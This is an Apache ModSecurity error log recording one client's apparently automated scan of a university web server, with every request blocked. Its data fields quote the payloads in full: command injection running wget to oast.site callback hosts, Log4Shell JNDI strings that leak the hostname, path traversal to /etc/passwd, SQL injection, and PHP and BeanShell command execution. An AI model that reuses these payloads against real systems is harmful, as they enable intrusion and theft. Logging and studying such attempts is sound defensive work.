[Tue Aug 29 11:30:32.672411 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPpWb4AAAAI"]
[Tue Aug 29 11:30:33.632395 2023] [:error] [pid 1008] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPw@TcAAAAR"]
[Tue Aug 29 11:30:34.324113 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg9yr4zwxcum4sa.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPiBgEAAAAB"]
[Tue Aug 29 11:30:34.445665 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPpWcoAAAAI"]
[Tue Aug 29 11:30:34.468100 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPpWcsAAAAI"]
[Tue Aug 29 11:30:34.473439 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPpWcsAAAAI"]
[Tue Aug 29 11:30:35.347022 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPOhZEAAAAa"]
[Tue Aug 29 11:30:35.746024 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAANjpzMAAAAT"]
[Tue Aug 29 11:30:36.431557 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAANh1sIAAAAA"]
[Tue Aug 29 11:30:37.335846 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPiBg4AAAAB"]
[Tue Aug 29 11:30:37.576647 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPENeQAAAAQ"]
[Tue Aug 29 11:30:37.584895 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPDnyUAAAAP"]
[Tue Aug 29 11:30:37.641222 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAOOuWkAAAAW"]
[Tue Aug 29 11:30:39.401244 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAOM4XoAAAAU"]
[Tue Aug 29 11:30:39.434415 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPXAnkAAAAi"]
[Tue Aug 29 11:30:39.436356 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPXAnkAAAAi"]
[Tue Aug 29 11:30:41.861007 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAPXAowAAAAi"]
[Tue Aug 29 11:30:42.667206 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAPXApMAAAAi"]
[Tue Aug 29 11:30:43.446701 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgszedicuk85grh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPiBiEAAAAB"]
[Tue Aug 29 11:30:43.447990 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAOH4V4AAAAH"]
[Tue Aug 29 11:30:44.314628 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPv-GoAAAAM"]
[Tue Aug 29 11:30:45.344282 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAOM4YYAAAAU"]
[Tue Aug 29 11:30:46.324387 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10dsCo-f0AAAPPSxIAAAAd"]
[Tue Aug 29 11:30:47.431639 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPOhaoAAAAa"]
[Tue Aug 29 11:30:47.476685 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAOOuZUAAAAW"]
[Tue Aug 29 11:30:47.538851 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPPSxcAAAAd"]
[Tue Aug 29 11:30:48.304766 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlg9tinshozabiqd.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAOOuZcAAAAW"]
[Tue Aug 29 11:30:48.306299 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPDn0oAAAAP"]
[Tue Aug 29 11:30:50.312396 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10esCo-f0AAAPmhOMAAAAV"]
[Tue Aug 29 11:30:50.429701 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPxBU8AAAAS"]
[Tue Aug 29 11:30:51.364533 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAOKNrcAAAAK"]
[Tue Aug 29 11:30:51.373347 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgy5mz89ms4hkcf.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPmhOoAAAAV"]
[Tue Aug 29 11:30:52.357427 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAP05GUAAAAA"]
